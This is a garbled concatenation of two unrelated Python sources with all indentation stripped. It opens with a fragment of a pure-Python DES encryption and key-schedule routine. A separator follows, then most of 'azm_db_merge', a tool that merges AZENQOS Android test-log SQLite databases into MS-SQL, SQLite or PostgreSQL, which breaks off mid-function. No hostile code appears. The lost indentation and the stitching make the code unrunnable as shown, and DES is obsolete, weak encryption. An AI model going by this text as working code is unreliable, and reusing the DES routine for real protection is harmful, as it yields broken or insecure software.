l0 = c2l(input[0:4])
l1 = c2l(input[4:8])
ll = [l0]
ll.append(l1)
# print ll
ll = des_encript(ll, ks, encrypt)
# print ll
l0 = ll[0]
l1 = ll[1]
output = l2c(l0)
output = output + l2c(l1)
# print output
l0, l1, ll[0], ll[1] = U32(0), U32(0), U32(0), U32(0)
return output
def des_set_key(key):
# key - des_cblock - UChar[8]
# schedule - des_key_schedule
# register unsigned long c,d,t,s;
# register unsigned char *in;
# register unsigned long *k;
# register int i;
# k = schedule
# in = key
k = []
c = c2l(key[0:4])
d = c2l(key[4:8])
t = U32(0)
d, c, t = PERM_OP((d, c, t), 4, U32(0x0f0f0f0f))
c, t = HPERM_OP((c, t), -2, U32(0xcccc0000))
d, t = HPERM_OP((d, t), -2, U32(0xcccc0000))
d, c, t = PERM_OP((d, c, t), 1, U32(0x55555555))
c, d, t = PERM_OP((c, d, t), 8, U32(0x00ff00ff))
d, c, t = PERM_OP((d, c, t), 1, U32(0x55555555))
d = (((d & U32(0x000000ff)) << 16) | (d & U32(0x0000ff00)) | ((d & U32(0x00ff0000)) >> 16) | (
(c & U32(0xf0000000)) >> 4))
c = c & U32(0x0fffffff)
for i in range(16):
if (shifts2[i]):
c = ((c >> 2) | (c << 26))
d = ((d >> 2) | (d << 26))
else:
c = ((c >> 1) | (c << 27))
d = ((d >> 1) | (d << 27))
c = c & U32(0x0fffffff)
d = d & U32(0x0fffffff)
s = des_skb[0][int((c) & U32(0x3f))] | \
des_skb[1][int(((c >> 6) & U32(0x03)) | ((c >> 7) & U32(0x3c)))] | \
des_skb[2][int(((c >> 13) & U32(0x0f)) | ((c >> 14) & U32(0x30)))] | \
des_skb[3][int(((c >> 20) & U32(0x01)) | ((c >> 21) & U32(0x06)) | ((c >> 22) & U32(0x38)))]
t = des_skb[4][int((d) & U32(0x3f))] | \
des_skb[5][int(((d >> 7) & U32(0x03)) | ((d >> 8) & U32(0x3c)))] | \
des_skb[6][int((d >> 15) & U32(0x3f))] | \
des_skb[7][int(((d >> 21) & U32(0x0f)) | ((d >> 22) & U32(0x30)))]
# print s, t
k.append(((t << 16) | (s & U32(0x0000ffff))) & U32(0xffffffff))
s = ((s >> 16) | (t & U32(0xffff0000)))
s = (s << 4) | (s >> 28)
k.append(s & U32(0xffffffff))
schedule = k
return schedule
|
|
infostr = '''azm_db_merge version 1.0 Copyright (c) 2016 Freewill FX Co., Ltd. All rights reserved.'''
usagestr = '''
Merge (import) AZENQOS Android .azm
test log files that contain SQLite3 database files (azqdata.db) into a target
central database (Now MS-SQL and SQLite3 only, later/roadmap: PostgreSQL and MySQL).\n
Please read SETUP.txt and INSTRUCTIONS.txt for usage examples.
Copyright: Copyright (C) 2016 Freewill FX Co., Ltd. All rights reserved.
'''
import subprocess
from subprocess import call
import sys
import signal
import argparse
import importlib
import time
import debug_helpers
from debug_helpers import dprint
import zipfile
import os
import shutil
import uuid
import traceback
import fnmatch
import hashlib
import glob
import psutil
from datetime import timedelta
from datetime import datetime
from datetime import tzinfo
class timezone(tzinfo):
"""UTC"""
offset_seconds = None
def __init__(self, offset_seconds):
self.offset_seconds = offset_seconds
def utcoffset(self, dt):
return timedelta(seconds=self.offset_seconds)
def tzname(self, dt):
return "custom_timezone_offset_seconds_{}".format(self.offset_seconds)
def dst(self, dt):
return timedelta(seconds=self.offset_seconds)
# https://stackoverflow.com/questions/51913210/python-script-with-timezone-fails-when-back-ported-to-python-2-7
# global vars
g_target_db_types = ['postgresql','mssql','sqlite3']
g_check_and_dont_create_if_empty = False
def parse_cmd_args():
parser = argparse.ArgumentParser(description=infostr, usage=usagestr,
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument('--azm_file',help='''An AZENQOS Android .azm file (or directory that contains multiple .azm files)
that contains the SQLite3 "azqdata.db" to merge/import. If you want azm_db_merge to try find from multiple full paths, using whichever is first present, separate the strings with a comma.
(a .azm is actually a zip file)''', required=True)
parser.add_argument('--unmerge',
action='store_true',
help="un-merge mode: remove all rows of this azm from target_db.",
default=False)
parser.add_argument('--folder_mode_stop_on_first_failure',
action='store_true',
help="""If --azm_file supplied was a folder,
by default it would not stop in the first failed azm.
Set this to make it stop at the first .azm that failed to merge/import.
""",
default=False)
parser.add_argument('--target_db_type', choices=g_target_db_types,
help="Target DBMS type ", required=True)
parser.add_argument(
'--pg_port', help='''Specify postgres port number''',
type=int,
default=5432,
required=False
)
parser.add_argument('--target_sqlite3_file',
help="Target sqlite3 file (to create) for merge", required=False)
parser.add_argument('--docker_postgres_server_name',
help="Same as --pg_host option. If azm_db_merge is running in a 'Docker' container and postgres+postgis is in another - use this to specify the server 'name'. NOTE: The azm file/folder path must be in a shared folder (with same the path) between this container and the postgres container as we're using the COPY command that requires access to a 'local' file on the postgres server.",
required=False,
default=None)
parser.add_argument('--pg_host',
help="Postgres host (default is localhost)",
required=False,
default='localhost')
parser.add_argument('--server_user',
help="Target login: username.", required=True)
parser.add_argument('--server_password',
help="Target login: password.", required=True)
parser.add_argument('--server_database',
help="Target database name.", required=True)
parser.add_argument('--check_and_dont_create_if_empty',
action='store_true',
help="Force check and omit table create if table is empty. This check, however, can make processing slower than default behavior.",
default=False)
parser.add_argument('--sqlite3_executable',
help="Full path to sqlite3 executable.",
default="sqlite3")
parser.add_argument('--mssql_odbc_driver',
help="Driver string for SQL Server",
default="{SQL Server Native Client 11.0}")
parser.add_argument('--dump_to_file_mode',
action='store_true',
help="""Set this to force full dump of sqlite3 db to .sql file
first before reading and parsing.
(We found that this is a bit slower and taks some disk space).""",
default=False)
parser.add_argument('--exclude_tables',
help="""List tables to exclude from merge - separated by commas. Default tables 'spatial_ref_sys,geometry_columns' are always ommitted.""",
default='')
parser.add_argument('--only_tables',
help="""List tables to "import only these tables". Default tables 'logs,' are always imported.""",
default='')
parser.add_argument('--import_geom_column_in_location_table_only',
action='store_true',
help="""Omit 'geom' geometry column in all tables except the 'location' table.
By default, all tables contain the 'geom' geometry column for convenient use with QGIS.
However, all other tables have 'pos_id' that can be used with 'log_hash' to join/match with the 'location' table manually
(or as a view) if user decides to avoid this redundant data.""",
default=False)
parser.add_argument('--call_preprocess_func_in_module_before_import',
help="""Specify a python module (.py file) that has the function 'preprocess(dir_processing_azm)' to be called before importing the 'azqdata.db' file. If you have multiple modules/functions to preprocess - simply make and specify a module that calls all of them.""",
default=None)
parser.add_argument('--dry',
help="""specify the string 'true' (without quotes) to skip the target database procedure - designed just for looping to call the "preprocess" func mode (without unzipping the azm) where real import is not required like using with legacy AzqGen.exe calls to import to legacy mysql db with legacy schemas.""",
default='',
required=False)
parser.add_argument('--move_imported_azm_files_to_folder',
help='''If specified, succssfully imported azm files would get moved to that folder.''',
default=None,
required=False)
parser.add_argument('--move_failed_import_azm_files_to_folder',
help='''If specified, failed-to-import azm files would get moved to that folder.''',
default=None,
required=False)
parser.add_argument('--pg_schema',
help='''If specified, will create/use this schema for all tables.''',
default="public",
required=False)
parser.add_argument('--daemon_mode_rerun_on_folder_after_seconds',
help='''If specified, azm_db_merge will block re-run on the same folder (specified with '--azm_file') again after the specified number of seconds.''',
default=None,
required=False)
parser.add_argument('--add_imei_id_to_all_tables',
action='store_true',
help="""Add log device's IMEI to all rows in all tables.""",
default=False)
parser.add_argument('--debug',
action='store_true',
help="""Set debug (verbose) mode printing.
""",
default=False)
parser.add_argument('--keep_temp_dir',
action='store_true',
help="""Dont delete temp dirs (that holds csv dumps) at end for further manual analysis.
""",
default=False)
parser.add_argument('--dump_parquet',
action='store_true',
help="""Use Pandas to dump each table to Parquet files.
""",
default=False)
parser.add_argument('--get_schema_shasum_and_exit',
action='store_true',
help="""Compute the schema of the azqdata.db inside the specified azm and exit. Example:
python azm_db_merge.py --target_db_type sqlite3 --azm_file example_logs/358096071732800\ 2_1_2017\ 13.12.49.azm --server_user "" --server_password "" --server_database "" --target_sqlite3_file merged.db --get_schema_shasum_and_exit
""",
default=False)
parser.add_argument('--pg10_partition_by_month',
action='store_true',
help="""For postgresql v10 only - when create tables - do declartive partitioning by month like '2017_06' etc""",
default=False)
parser.add_argument('--pg10_partition_index_log_hash',
action='store_true',
help="""For postgresql v10 only - when creating partitions, set log_hash as the index of the table""",
default=False)
args = vars(parser.parse_args())
return args
def is_dump_schema_only_for_target_db_type(args):
# now force bulk so always schema only
return True
"""
def popen_sqlite3_dump(args):
params = [
args['sqlite3_executable'],
args['file']
]
if (is_dump_schema_only_for_target_db_type(args)):
params.append(".schema")
else:
params.append(".dump")
print("popen_sqlite3_dump params: "+str(params))
sub = subprocess.Popen(
params,
bufsize = -1, # -1 means default of OS. If no buf then it will block sqlite and very slow
shell=False,
stdout=subprocess.PIPE,
#stderr=subprocess.STDOUT
#stderr=sys.stdout.fileno()
)
dprint("subporcess popen done")
return sub
"""
# Dump db to a text sql file
def dump_db_to_sql(dir_processing_azm):
dumped_sql_fp = "{}_dump.sql".format(args['file'])
cmd = [
"{}".format(args['sqlite3_executable']),
"{}".format(args['file']),
".out {}".format(dumped_sql_fp.replace("\\", "\\\\")),
".schema" if (is_dump_schema_only_for_target_db_type(args)) else ".dump"
]
print("cmd: ",cmd)
ret = call(cmd, shell=False)
print("conv ret: "+str(ret))
if (ret != 0):
print("dump db to {} file failed - ABORT".format(dumped_sql_fp))
return None
print("dump db to {} file success".format(dumped_sql_fp))
return dumped_sql_fp
# global vars for handle_sql3_dump_line
g_is_in_insert = False
g_is_in_create = False
g_insert_buf = ""
g_create_buf = ""
# global module functions
g_connect_function = None
g_check_if_already_merged_function = None
g_create_function = None
g_commit_function = None
g_close_function = None
# g_insert_function = None
# parse multi-line statements info one for insert, parse create, commit commands and call related funcs of target db type module
def handle_sql3_dump_line(args, line):
global g_is_in_insert
global g_is_in_create
global g_insert_buf
global g_create_buf
global g_insert_function
if g_is_in_insert is True:
g_insert_buf = g_insert_buf + line
if line.strip().endswith(");"):
handle_ret = g_insert_function(args, g_insert_buf.strip())
g_is_in_insert = False
g_insert_buf = None
# dprint("multi line insert END:")
return handle_ret
else:
# dprint("multi line insert still not ending - continue")
return True
if g_is_in_create:
g_create_buf += line.strip()
if line.strip().endswith(");"):
line = g_create_buf
print("multi line create END") # \ng_is_in_create final line:", line
else:
return True
is_omit_table = False
if line.startswith("CREATE TABLE ") or g_is_in_create:
g_is_in_create = False
# in case user is using already 'sqlite3 merged azqdata.db' there will be the CREATE TABLE IF NOT EXISTS lines which we created - restore it...
line = line.replace("CREATE TABLE IF NOT EXISTS ","CREATE TABLE ",1)
if not line.strip().endswith(");"):
print("multi line create START")
g_is_in_create = True
g_create_buf = line.strip()
return True
table_name = line.split(" (")[0].replace("CREATE TABLE ","").replace("\"","")
dprint("check table_name is_omit_table: "+table_name)
is_omit_table = table_name in args['omit_tables_array'] or table_name == "azq_internal_types"
dprint("is this table in --omit_tables ? "+table_name+" = "+str(is_omit_table))
if args['only_tables_on']:
dprint("--only_tables on - check if we should exclude this table: "+table_name)
is_omit_table = True
if table_name in args['only_tables_array']:
is_omit_table = False
dprint("--only_tables on - exclude this table? "+table_name+" = "+str(is_omit_table))
if (
line.startswith("CREATE TABLE ") and
not line.startswith("CREATE TABLE android_metadata") and
not ("_layer_statistics" in line) and
not is_omit_table
):
# get table name:
table_name = line.split(" ")[2].replace("\"", "")
''' put where in select at create csv instead - delete where would be a cmd and slower too
if not args['unmerge']:
#print "delete all rows with wrong modem timestamp before 48h of log_start_time and log_end_time for this table:", table_name
sqlstr = "delete from {} where time < '{}' or time > '{}' or time is null;".format(table_name, args['log_data_min_time'], args['log_data_max_time'])
cmd = [args['sqlite3_executable'],args['file'],sqlstr]
#print "call cmd:", cmd
try:
outstr = subprocess.check_output(cmd).decode()
#print "delete from ret outstr:", outstr
except Exception as se:
print "WARNING: delete pre y2k rows from table failed exception:", se
'''
print(("\nprocessing: create/alter/insert for table_name: "+table_name))
print("processing create at handler module...") # always create - flag override
handle_ret = g_create_function(args, line)
elif (line.startswith("COMMIT;")):
print("\nprocessing: commit")
handle_ret = g_commit_function(args, line)
return handle_ret
elif (line.startswith("INSERT INTO")):
raise Exception("ABORT: currently bulk insert mode is used so only scheme should be dumped/read... found INSERT INTO - abort")
table_name = line.split(" ")[2].replace("\"", "")
if (table_name == "android_metadata"):
return True #omit
line_stripped = line.strip()
if line_stripped.endswith(");"):
# dprint("single line insert")
handle_ret = g_insert_function(args, line_stripped)
return handle_ret
else:
dprint("multi line insert START")
g_is_in_insert = True
g_insert_buf = line
return True
else:
# dprint "omit line: "+line
return True
return False
# unzip azm file to a tmp processing folder
def unzip_azm_to_tmp_folder(args):
dprint("unzip_azm_to_tmp_folder 0")
print("args['azm_file']: "+args['azm_file'])
azm_fp = os.path.abspath(args['azm_file'])
print("azm_fp: "+azm_fp)
if os.path.isfile(azm_fp):
pass
else:
raise Exception("INVALID: - azm file does not exist at given path: "+str(azm_fp)+" - ABORT")
dir_azm_unpack = os.path.dirname(azm_fp)
print("dir_azm_unpack: "+dir_azm_unpack)
azm_name_no_ext = os.path.splitext(os.path.basename(azm_fp))[0]
print("azm_name_no_ext: "+azm_name_no_ext)
if 'TMP_GEN_PATH' in os.environ:
dir_azm_unpack = os.environ['TMP_GEN_PATH']
print("dir_azm_unpack using TMP_GEN_PATH:", dir_azm_unpack)
TMPFS_DIR = "/tmpfs"
GB_BYTES = 1024 * 1024 * 1024
MIN_TMPFS_REMAIN_SPACE_BYTES = 8 * GB_BYTES
if os.path.isdir(TMPFS_DIR) and os.system("touch /tmpfs/test_touch") == 0:
cleanup_old_tmpfs_tmp_dirs_with_invalid_pid_files()
statvfs = os.statvfs(TMPFS_DIR)
remain_space = statvfs.f_frsize * statvfs.f_bfree
if remain_space > MIN_TMPFS_REMAIN_SPACE_BYTES:
print("using /tmpfs because remain_space {} MIN_TMPFS_REMAIN_SPACE_BYTES {}".format(remain_space,
MIN_TMPFS_REMAIN_SPACE_BYTES))
dir_azm_unpack = TMPFS_DIR # to speedup preprocess sqlite work step as it was blocking at disk io for heavy tests in test0 server - this will get auto cleanedup if proc crashed by cleanup_old_tmpfs_tmp_dirs_with_invalid_pid_files() func in preprocess_azm.py
else:
print("NOT using /tmpfs because remain_space {} MIN_TMPFS_REMAIN_SPACE_BYTES {}".format(remain_space,
MIN_TMPFS_REMAIN_SPACE_BYTES))
dir_processing_azm = os.path.join(dir_azm_unpack, "tmp_azm_db_merge_"+str(uuid.uuid4())+"_"+azm_name_no_ext.replace(" ","-")) # replace 'space' in azm file name
args['dir_processing_azm'] = dir_processing_azm
dprint("unzip_azm_to_tmp_folder 1 dir_processing_azm:", dir_processing_azm)
gen_pidfile_in_tmp_dir(dir_processing_azm)
# try clear tmp processing folder just in case it exists from manual unzip or previous failed imports
try:
shutil.rmtree(dir_processing_azm)
except Exception as e:
estr = str(e)
if ("cannot find the path specified" in estr or "No such file or" in estr):
pass
else:
print(("rmtree dir_processing_azm: "+str(e)))
raise e
dprint("unzip_azm_to_tmp_folder 2")
os.mkdir(dir_processing_azm)
dprint("unzip_azm_to_tmp_folder 3")
try:
azm = zipfile.ZipFile(args['azm_file'],'r')
azm.extract("azqdata.db", dir_processing_azm)
'''
try:
# handle malformed db cases
import pandas as pd
import sqlite3
dbfile = os.path.join(dir_processing_azm, "azqdata.db")
dbcon = sqlite3.connect(dbfile)
integ_check_df = pd.read_sql("PRAGMA integrity_check;", dbcon)
try:
dbcon.close() # we dont use dbcon in further azm_db_merge code, and db file can be removed if integ not ok - avoid file locks
except:
pass
print "azm_db_merge: sqlite db integ_check_df first row:", integ_check_df.iloc[0]
if integ_check_df.iloc[0].integrity_check == "ok":
print "azm_db_merge: sqlite3 db integrity check ok"
else:
print "azm_db_merge: sqlite3 db integrity check failed - try recover..."
dump_ret = subprocess.call("sqlite3 '{}' .dump > '{}.txt'".format(dbfile, dbfile),shell=True)
print "azm_db_merge: dump_ret:", dump_ret
if dump_ret != 0:
print "WARNING: azm_db_merge: recov corrupt sqlite db file - failed to dump sqlite db file"
else:
os.remove(dbfile)
import_ret = subprocess.call("sqlite3 '{}' < '{}.txt'".format(dbfile, dbfile), shell=True)
print "azm_db_merge: recov corrupt db file import ret:", import_ret
except:
type_, value_, traceback_ = sys.exc_info()
exstr = traceback.format_exception(type_, value_, traceback_)
print "WARNING: check malformed db exception:", exstr
'''
if args['get_schema_shasum_and_exit']:
print("get_schema_shasum_and_exit start")
sha1 = hashlib.sha1()
#print "get_schema_shasum_and_exit 1"
dbfile = os.path.join(dir_processing_azm,"azqdata.db")
#print "get_schema_shasum_and_exit 2"
cmd = [args['sqlite3_executable'],dbfile,".schema"]
print("call cmd:", cmd)
schema = subprocess.check_output(cmd).decode()
#print "get_schema_shasum_and_exit 3"
sha1.update(schema)
#print "get_schema_shasum_and_exit 4"
print(str(sha1.hexdigest())+" is the sha1 for the schema of azqdata.db inside azm: "+args['azm_file'])
print("get_schema_shasum_and_exit done")
azm.close()
cleanup_tmp_dir(dir_processing_azm)
exit(0)
azm.close()
except Exception as e:
try:
cleanup_tmp_dir(dir_processing_azm)
except:
pass
raise Exception("Invalid azm_file: azm file does not contain azqdata.db database - exception: "+str(e))
dprint("unzip_azm_to_tmp_folder 4")
args['file'] = os.path.join(dir_processing_azm, "azqdata.db")
return dir_processing_azm
def cleanup_tmp_dir(dir_processing_azm):
# clear tmp processing folder
attempts = list(range(5)) # 0 to 4
imax = len(attempts)
print("cleanup_tmp_dir: ",dir_processing_azm)
if dir_processing_azm != None and os.path.exists(dir_processing_azm) and os.path.isdir(dir_processing_azm):
pass
else:
return
for i in attempts:
try:
# print("cleaning up tmp dir...")
shutil.rmtree(dir_processing_azm)
break
# print("cleanup tmp_processing_ dir done.")
except Exception as e:
print(("warning: attempt %d/%d - failed to delete tmp dir: %s - dir_processing_azm: %s" % (i, imax, e,dir_processing_azm)))
time.sleep(0.01) # sleep 10 millis
pass
def check_azm_azq_app_version(args):
# check version of AZENQOS app that produced the .azm file - must be at least 3.0.562
MIN_APP_V0 = 3
MIN_APP_V1 = 0
MIN_APP_V2 = 587
sqlstr = "select log_app_version from logs" # there is always only 1 ver of AZENQOS app for 1 azm - and normally 1 row of logs per azm too - but limit just in-case to be future-proof
cmd = [args['sqlite3_executable'],args['file'],sqlstr]
print("call cmd:", cmd)
outstr = subprocess.check_output(cmd).decode().strip()
try:
args["azm_apk_version"] = "0.0.0"
outstr = outstr.replace("v","") # replace 'v' prefix - like "v3.0.562" outstr
print("azm app version outstr:", outstr)
parts = outstr.split(".")
v0 = int(parts[0]) * 1000 * 1000
v1 = int(parts[1]) * 1000
v2 = int(parts[2])
args["azm_apk_version"] = v0 + v1 + v2
if (args["azm_apk_version"] >= MIN_APP_V0*1000*1000 + MIN_APP_V1*1000 + MIN_APP_V2):
pass
else:
print("WARNING: azm too old - azm file must be from AZENQOS apps with versions {}.{}.{} or newer.".format(MIN_APP_V0,MIN_APP_V1,MIN_APP_V2))
except:
type_, value_, traceback_ = sys.exc_info()
exstr = traceback.format_exception(type_, value_, traceback_)
print("WARNING: check azm app version exception:", exstr)
return outstr
def mv_azm_to_target_folder(args):
mv_target_folder = args['move_imported_azm_files_to_folder']
if not mv_target_folder is None:
if not os.path.exists(mv_target_folder):
os.makedirs(mv_target_folder)
azm_fp = os.path.abspath(args['azm_file'])
target_fp = os.path.join(mv_target_folder,os.path.basename(azm_fp))
try:
os.remove(target_fp)
os.remove(target_fp+"_output.txt")
except:
pass
print("move_imported_azm_files_to_folder: mv {} to {}".format(azm_fp,target_fp))
os.rename(azm_fp, target_fp)
try:
os.rename(azm_fp+"_output.txt", target_fp+"_output.txt")
except:
pass
def process_azm_file(args):
proc_start_time = time.time()
ret = -9
use_popen_mode = True
sql_dump_file = None
try:
dir_processing_azm = None
dry_str = args['dry']
dry_str = dry_str.strip().lower()
dry_mode = (dry_str == "true")
print("dry_mode setting: ",dry_mode)
if dry_mode:
print("dry_mode - dont unzip azm for azqdata.db - let preprocess func handle itself")
else:
print("normal import mode")
dir_processing_azm = unzip_azm_to_tmp_folder(args)
args['dir_processing_azm'] = dir_processing_azm
preprocess_module = args['call_preprocess_func_in_module_before_import']
if not preprocess_module is None:
preprocess_module = preprocess_module.replace(".py","",1)
print("get preprocess module: ", preprocess_module)
importlib.import_module(preprocess_module)
mod = sys.modules[preprocess_module]
preprocess = getattr(mod, 'preprocess')
print("exec preprocess module > preprocess func")
preprocess(dir_processing_azm,args['azm_file'])
if dry_mode:
print("dry_mode - end here")
mv_azm_to_target_folder(args)
return 0
app_ver = check_azm_azq_app_version(args)
print("app_ver:", app_ver)
assert app_ver
args['app_ver'] = app_ver
args['app_ver_newer_than_in_pg'] = False
args['need_check_remote_cols'] = True
try:
import redis
redis_cache = redis.Redis(host='redis', port=6379)
pg_newest_azm_app_ver = redis_cache.get("pg_newest_azm_app_ver").decode()
print("pg_newest_azm_app_ver:", pg_newest_azm_app_ver)
if pg_newest_azm_app_ver:
if app_ver > pg_newest_azm_app_ver:
print("case: pg_newest_azm_app_ver and (app_ver > pg_newest_azm_app_ver)")
args['app_ver_newer_than_in_pg'] = True
args['need_check_remote_cols'] = args['app_ver_newer_than_in_pg']
else:
print("NOT case: pg_newest_azm_app_ver and (app_ver > pg_newest_azm_app_ver)")
args['app_ver_newer_than_in_pg'] = False
args['need_check_remote_cols'] = args['app_ver_newer_than_in_pg']
except:
type_, value_, traceback_ = sys.exc_info()
exstr = str(traceback.format_exception(type_, value_, traceback_))
print("redis check pg_newest_azm_app_ver excepition:", exstr)
print("args['app_ver_newer_than_in_pg']:", args['app_ver_newer_than_in_pg'])
print("args['need_check_remote_cols']:", args['need_check_remote_cols'])
g_check_and_dont_create_if_empty = args['check_and_dont_create_if_empty']
use_popen_mode = not args['dump_to_file_mode']
if args['target_db_type'] == "sqlite3":
if args['target_sqlite3_file'] is None:
raise Exception("INVALID: sqlite3 merge mode requires --target_sqlite3_file option to be specified - ABORT")
else:
use_popen_mode = False # dump to .sql file for .read
print("NOTE: now we delete pre y2k rows and if it was popen then the delete would error as 'database is locked' so always dump schema to sql - so force set use_popen_mode = False")
use_popen_mode = False
if (use_popen_mode):
print("using live in-memory pipe of sqlite3 dump output parse mode")
else:
print("using full dump of sqlite3 to file mode")
dump_process = None
dumped_sql_fp = None
if (use_popen_mode):
print("starting sqlite3 subporcess...")
dump_process = popen_sqlite3_dump(args)
if dump_process is None:
raise Exception("FATAL: dump_process is None in popen_mode - ABORT")
else:
print("starting sqlite3 to dump db to .sql file...")
dumped_sql_fp = dump_db_to_sql(dir_processing_azm)
if dumped_sql_fp is None:
raise Exception("FATAL: dumped_sql_fp is None in non popen_mode - ABORT")
# sqlite3 merge is simple run .read on args['dumped_sql_fp']
if args['target_db_type'] == "sqlite3":
is_target_exists = os.path.isfile(args['target_sqlite3_file'])
print("sqlite3 - import to {} from {}".format(args['target_sqlite3_file'], dumped_sql_fp))
dumped_sql_fp_adj = dumped_sql_fp + "_adj.sql"
of = open(dumped_sql_fp,"r")
nf = open(dumped_sql_fp_adj,"w") # wb required for windows so that \n is 0x0A - otherwise \n will be 0x0D 0x0A and doest go with our fmt file and only 1 row will be inserted per table csv in bulk inserts...
while True:
ofl = of.readline().decode()
if ofl == "":
break
ofl = ofl.replace("CREATE TABLE android_metadata (locale TEXT);","",1)
ofl = ofl.replace('CREATE TABLE "','CREATE TABLE IF NOT EXISTS "',1)
if ofl.startswith('INSERT INTO "android_metadata"'):
ofl = ""
if is_target_exists:
# dont insert or create qgis tables
if ofl.startswith("CREATE TABLE geometry_columns") or ofl.startswith("CREATE TABLE spatial_ref_sys") or ofl.startswith('INSERT INTO "spatial_ref_sys"') or ofl.startswith('INSERT INTO "geometry_columns"'):
ofl = ""
nf.write(ofl)
#nf.write('\n')
nf.close()
of.close()
cmd = [
args['sqlite3_executable'],
args['target_sqlite3_file'],
".read {}".format(dumped_sql_fp_adj.replace("\\", "\\\\"))
]
print("cmd: ",cmd)
ret = call(cmd, shell=False)
print("import ret: "+str(ret))
if (ret == 0):
print(( "\n=== SUCCESS - import completed in %s seconds" % (time.time() - proc_start_time) ))
if debug_helpers.debug == 1 or args['keep_temp_dir']:
print("debug mode keep_tmp_dir:", dir_processing_azm)
else:
cleanup_tmp_dir(dir_processing_azm)
return 0
else:
if debug_helpers.debug == 1 or args['keep_temp_dir']:
print("debug mode keep_tmp_dir:", dir_processing_azm)
else:
cleanup_tmp_dir(dir_processing_azm)
raise Exception("\n=== FAILED - ret %d - operation completed in %s seconds" % (ret, time.time() - proc_start_time))
raise Exception("FATAL: sqlite3 mode merge process failed - invalid state")
# now we use bulk insert done at create/commit funcs instead g_insert_function = getattr(mod, 'handle_sqlite3_dump_insert')
print("### connecting to dbms...")
ret = g_connect_function(args)
if ret == False:
raise Exception("FATAL: connect_function failed")
if (args['unmerge']):
print("### unmerge mode")
# unmerge mode would be handled by same check_if_already_merged_function below - the 'unmerge' flag is in args
# check if this azm is already imported/merged in target db (and exit of already imported)
# get log_hash
sqlstr = "select log_hash from logs limit 1"
cmd = [args['sqlite3_executable'],args['file'],sqlstr]
print("call cmd:", cmd)
outstr = subprocess.check_output(cmd).decode()
log_hash = outstr.strip()
args['log_hash'] = int(log_hash)
print("args['log_hash']:", args['log_hash'])
sqlstr = "select log_timezone_offset from logs limit 1"
cmd = [args['sqlite3_executable'],args['file'],sqlstr]
print("call cmd:", cmd)
outstr = subprocess.check_output(cmd).decode()
tzoff = outstr.strip()
args['log_timezone_offset'] = int(tzoff) # in millis
print("args['log_timezone_offset']:", args['log_timezone_offset'])
ori_log_hash_datetime = datetime.fromtimestamp(
(args['log_hash'] & 0xffffffff),
timezone(args['log_timezone_offset']/1000)
) # log_hash lower 32 bits is the timestamp
args['ori_log_hash_datetime'] = ori_log_hash_datetime
print("args['ori_log_hash_datetime']:", args['ori_log_hash_datetime'])
log_hash_ym_str = ori_log_hash_datetime.strftime('%Y_%m')
args['log_hash_ym_str'] = log_hash_ym_str
print("args['log_hash_ym_str']:", args['log_hash_ym_str'])
if log_hash == 0:
raise Exception("FATAL: invalid log_hash == 0 case")
args['log_start_time_str'] = get_sql_result(
"select log_start_time from logs limit 1",
args
)
args['log_end_time_str'] = get_sql_result(
"select log_end_time from logs limit 1",
args
)
#print "args['log_end_time_str']:", args['log_end_time_str']
args['log_start_time'] = get_sql_result(
"select strftime('%s', log_start_time) from logs limit 1",
args
)
print("parse log_start_time:", args['log_start_time'])
args['log_start_time'] = datetime.fromtimestamp(int(args['log_start_time']))
print("args['log_start_time']:", args['log_start_time'])
print("args['log_start_time_str']:", args['log_start_time_str'])
args['log_end_time'] = get_sql_result(
"select strftime('%s', log_end_time) from logs limit 1",
args
)
# some rare cases older apks log_end_time somehow didnt get into db
if not args['log_end_time']:
args['log_end_time'] = get_sql_result(
"select strftime('%s', max(time)) from android_info_1sec",
args
)
print("parse log_end_time:", args['log_end_time'])
args['log_end_time'] = datetime.fromtimestamp(int(args['log_end_time']))
print("args['log_end_time']:", args['log_end_time'])
print("args['log_end_time_str']:", args['log_end_time_str'])
args['log_data_min_time'] = args['log_start_time'] - timedelta(hours=48)
print("args['log_data_min_time']:", args['log_data_min_time'])
args['log_data_max_time'] = args['log_end_time'] + timedelta(hours=48)
print("args['log_data_max_time']:", args['log_data_max_time'])
if log_hash == 0:
raise Exception("FATAL: invalid log_hash == 0 case")
g_check_if_already_merged_function(args, log_hash)
''' now we're connected and ready to import, open dumped file and hadle CREATE/INSERT
operations for current target_type (DBMS type)'''
if (use_popen_mode == False):
sql_dump_file = open(dumped_sql_fp, 'rb')
# output for try manual import mode
# args['out_sql_dump_file'] = open("out_for_dbtype_{}.sql".format(args['file']), 'w')
dprint("entering main loop")
n_lines_parsed = 0
while(True):
if (use_popen_mode):
line = dump_process.stdout.readline().decode()
else:
line = sql_dump_file.readline().decode()
dprint("read line: "+line)
# when EOF is reached, we'd get an empty string
if (line == ""):
print("\nreached end of file/output")
break
else:
n_lines_parsed = n_lines_parsed + 1
handle_sql3_dump_line(args, line)
# finally call commit again in case the file didn't have a 'commit' line at the end
print("### calling handler's commit func as we've reached the end...")
handle_ret = g_commit_function(args, line)
# call close() for that dbms handler
operation = "merge/import"
if (args['unmerge']):
operation = "unmerge/delete"
else:
# set "pg_newest_azm_app_ver" in redis
try:
import redis
redis_cache = redis.Redis(host='redis', port=6379)
if args['app_ver_newer_than_in_pg'] or redis_cache.get("pg_newest_azm_app_ver") is None:
print('need do redis_cache set("pg_newest_azm_app_ver")')
redis_cache.set("pg_newest_azm_app_ver", args['app_ver'])
else:
print('no need do redis_cache set("pg_newest_azm_app_ver")')
except:
type_, value_, traceback_ = sys.exc_info()
exstr = str(traceback.format_exception(type_, value_, traceback_))
print("redis set pg_newest_azm_app_ver excepition:", exstr)
if (n_lines_parsed != 0):
print(( "\n=== SUCCESS - %s completed in %s seconds - tatal n_lines_parsed %d (not including bulk-inserted-table-content-lines)" % (operation, time.time() - proc_start_time, n_lines_parsed) ))
ret = 0
mv_azm_to_target_folder(args)
else:
raise Exception("\n=== FAILED - %s - no lines parsed - tatal n_lines_parsed %d operation completed in %s seconds ===" % (operation, n_lines_parsed, time.time() - proc_start_time))
except Exception as e:
type_, value_, traceback_ = sys.exc_info()
exstr = traceback.format_exception(type_, value_, traceback_)
mv_target_folder = args['move_failed_import_azm_files_to_folder']
if not mv_target_folder is None and not os.path.exists(mv_target_folder):
os.makedirs(mv_target_folder)
if not mv_target_folder is None:
azm_fp = os.path.abspath(args['azm_file'])
target_fp = os.path.join(mv_target_folder,os.path.basename(azm_fp))
try:
os.remove(target_fp)
os.remove(target_fp+"_output.txt")
except Exception as x:
pass
print("move the failed_import_azm_files_to_folder: mv {} to {}".format(azm_fp,target_fp))
try:
os.rename(azm_fp, target_fp)
